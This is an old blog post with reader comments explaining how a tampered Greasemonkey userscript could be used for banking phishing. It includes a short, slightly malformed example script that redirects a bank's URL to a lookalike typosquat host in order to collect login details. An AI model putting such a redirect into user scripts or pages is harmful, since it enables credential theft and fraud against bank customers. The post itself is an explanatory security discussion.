Greasmonkey Phishing: Security 

Greasmonkey Phishing: Security

Greasemonkey is an extension to Firefox that allows you to write code to alter how a web page is viewed. For example it can remove adverts from your favourite webpage or replace rude words on web pages with milder alternatives. To alter pages in this way code that serves as instructions to the browser on how to change the webpage is loaded into Firefox.

Now suppose someone or some program has access to your computer, can Greasemonkey be used for nefarious purposes? Once you can run programs on a machine many malicious opportunities arise, even just by altering text files like autoexec.bat or hosts file.

If your enemy or his program goes to one of these greasemonkey code files he can alter the instructions in the file and you will not be informed. I am not sure this is a bug as the alternative is those constant nag screens that say something like “something somewhere has changed, do you want to panic now?” which everyone ignores after a while.

So how can your enemy by altering a greasemonkey script empty your bank account and go live in the Caribbean? The best way would be to alter the commands you send to your bank account and the responses your bank sends back to you. Because the malicious script is just altering an existing banking session it does not need to know secret passwords and such as you supply them.

I could go into details about how you would code up this behaviour but I think a simple script illustrates better
Say the attacker alters an existing script by adding the lines
// @include yourbank.com

window.location.href = window.location.href.replace(/^
http://yourbank.com/, 'http:y0urbank.com');

When you try to go to your bank this altered script brings you to a page that looks very similar to your banks one. You give in your registration number and digits 1, 2 and 3 of your 6 digit secret key and answer one of your pets names. A failure message pops up and you are asked to re-enter your details with digits 4, 5 and 6 this time and your date of birth. Different banks have different systems but this would be enough information for many banks for the attacker to have full access to your account.

Return to Main Page

Comments

Comment >its relativly easy for a script kiddie to develop one without much technical skill...so the risk factor is greater. I would say the risk in a greasemonkey script is much lower then a firefox extension or an internet explorer BHO. Still a risk is there and telling people "oh you should look through the code" is expecting alot of greasemonkeys users. Thanks for the comment

Mon Sep 25, 2006 9:47 am MST by cavedave

Comment lots of hacks write such greasemonkey scripts and make them availale for download..there are a ton of em on the interweb...they might serve some useful function and also contain some malware as desribed above...not so difficult to persuade someone to install them volentarily,.. however it would be easy to trace the origon of such malware... point is that anything you install on your PC carries a risk. now the thing about greasemonkey scripts is that the barrier to entry is low....its relativly easy for a script kiddie to develop one without much technical skill...so the risk factor is greater.

Mon Sep 25, 2006 9:26 am MST by Anonymous

Comment >I asume this comment won't appear as you don't have any already visible, No it is because nobody reads this blog. >First of all, there is no hosts.ini. It's just "host". Sorry my mistake I corrected this. >Second, if you for some extraordinary way could modify a greasemonkey script, that would mean that you have much more access to the machine, so greasemonkey is the last of your worrying. Agreed. I though i made this clear in the sentance "Once you can run programs on a machine many malicious opportunities arise". Yes you would have to have greasemonkey installed before greasemonkey could be used. That is not an insightful point you are making > See ya :) Bye Thanks for the comment.

Fri Sep 22, 2006 1:16 am MST by Anonymous

Comment You don't know what you are talking about do you? First of all, there is no hosts.ini. It's just "host". Second, if you for some extraordinary way could modify a greasemonkey script, that would mean that you have much more access to the machine, so greasemonkey is the last of your worrying. You would have to install firefox, then the greasemonkey extension, then the greasemonkey script. And then they should have access to modify the script. If someone can do that, you are in trouble for other reasons. I call it FUD. There are some more wrong points in this post, which I won't address but if you want, i can discuss it with you. I asume this comment won't appear as you don't have any already visible, but that's up to you. You have to research much more before spreading fud. See ya :)

Thu Sep 21, 2006 2:46 pm MST by Masio

Add Comment




Search This Site


Syndicate this blog site

Powered by BlogEasy


Free Blog Hosting